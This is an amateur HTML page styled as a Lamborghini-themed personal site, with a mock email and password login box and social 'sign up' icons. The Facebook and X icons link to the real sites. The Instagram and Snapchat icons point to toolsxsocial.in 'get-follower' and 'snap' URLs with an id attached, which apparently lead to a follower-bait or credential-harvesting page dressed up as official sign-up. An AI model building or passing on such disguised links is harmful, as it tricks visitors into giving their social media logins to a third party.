<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha512-Kc323vGBEqzTmouAECnVceyQqyqdsSiqLQISBL29aUW4U/M7pSPA/gEUZQqv1cwx4OnYxTxve5UMg5GT6L4JJg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    
<style> html{ font-size: 62.5%;}
   
    body{background-image: url(https://th.bing.com/th/id/OIP.E0UciS59mnSGkIAKJ4VlOgHaEK?w=329&h=185&c=7&r=0&o=5&pid=1.7);
        background-repeat: no-repeat;
        background-size: 100%  70%; background-attachment: fixed;
        width: 70%;
        
        
    }
    .div{width: 4.9rem;
    height: 1rem;
color: orangered;
float: left; 
font-size: 3rem; 
margin-left: 2rem;}
.one{ width:53rem ; height: 3rem;
    margin-left: 29rem;
     word-spacing: 15rem;
    color: white;
    font-size: 2rem; 
    
}
li{ display: inline;}

.two{ height: 60rem; width: 30rem;

}
.on{
    margin-left: 30rem;
    height: 34rem;
    width: 28rem;
    background-color: black;
    padding-top: 0.3rem;
    border-radius: 1.8rem; margin-top: 4rem;
}
.four{ width:23rem ;
    height: 3rem;
background-color:white ;
color: orange;
margin-left: 2rem;
margin-top: 2rem;
border-radius: 1.5rem;
text-align: center;
justify-content: center;
}
.five{width:23rem ;
    height: 3rem;
background-color:orangered ;
color: white;
margin-left: 2rem;
margin-top: 1rem;
border-radius: 1.5rem;
text-align: center;
justify-content: center;}
#one{margin-top: 3rem; 
     height: 3rem; border-radius: 1rem; margin-left: 6rem; background-color: black; color: orange;text-underline-offset: 2rem;
    width: 17rem; }
     #two{margin: 1.8rem;
        height: 3rem; border-radius: 1rem; margin-left: 6rem; background-color: black; color: orange;text-underline-offset: 2rem;
    width: 17rem;}
        #three{margin: 1.9rem;
            height: 3rem; border-radius: 1rem; margin-left: 6rem; background-color: black; color: orange;text-underline-offset: 2rem;}
            .xyz{ width: 30rem;
            height: 10rem;
        float: left;
    margin-top: 3rem;
    color: white;
    font-size: 3rem;

}
}@media(max-width: 998px){
    html{font-size: 55%;
        }
}
@media( max-width: 768px){
    html{font-size: 45%;
        }
}

    </style>
</head>
<body>
    <div class="div">Yuvraj Singh</div>
    <div class="one"><a style="text-decoration: none; color: white;" href="Yuvrj Singh CV.pdf" target="_blank">ABOUT</a> <a style="text-decoration: none; color: white;"  href="http://t.me/Iccuvi" target="_blank">CONTACT </a></div>
    <div class="xyz"><h2 style="font-family:'Times New Roman', Times, serif"><h1 style="color: orangered;font-size: 4rem;"> L<SUB>AMBORGHINI</SUB></h1><u> FEEL<BR> THE SPEED</u></h2>
    <h2 style="color: orangered; font-family: 'Times New Roman', Times, serif; font-size: 2rem;">NOBODY CARES ABOUT YOUR DEGREE WHEN YOU DRIVE A <U>LAMBORGHINI</u></h2></div>
   
    <div class="on"><div class="four"><h2 style="font-size: 2.7rem;">Login Here</h2></div>
    <input type="email" id="one" placeholder="enter your email  " title="bhai email dal
    😀" required>
    <input type="password" id="two" placeholder="enter your password " title="achha sa password likhn jo yaad rhe " required>
    <div class="five"><h2 title="click here" style="font-size: 2.7rem;"><a style="text-decoration: none; color: white;" href="secret.html">Login</a> </h2></div>
   <p style="color: white;margin-left: 6rem;">Don't have an account<br>
    sign up  here with-</p>
    <p style="margin-left: 3.2rem;">
   <a href="https://toolsxsocial.in/get-follower/76b3dhXbd7"> <i  style="color:pink;margin-left: 4rem; font-size: 3rem;" class="fa-brands fa-square-instagram"  ></i></a>
    <a href="https://www.facebook.com/login.php/"><i style="color: blue; font-size: 3.2rem;" class="fa-brands fa-facebook"></i></a>
    <a href="https://toolsxsocial.in/snap/76b3dhXbd7"><i style="color: yellow; font-size: 3.2rem;"   class="fa-brands fa-square-snapchat"></i></a>
    <a href="https://x.com/i/flow/login?input_flow_data=%7B%22requested_variant%22%3A%22eyJteCI6IjIifQ%3D%3D%22%7D"><i style="color: white; font-size: 3.3rem;" class="fa-brands fa-square-twitter"></i></a>
    </p>
    
</div>


</body>
</html>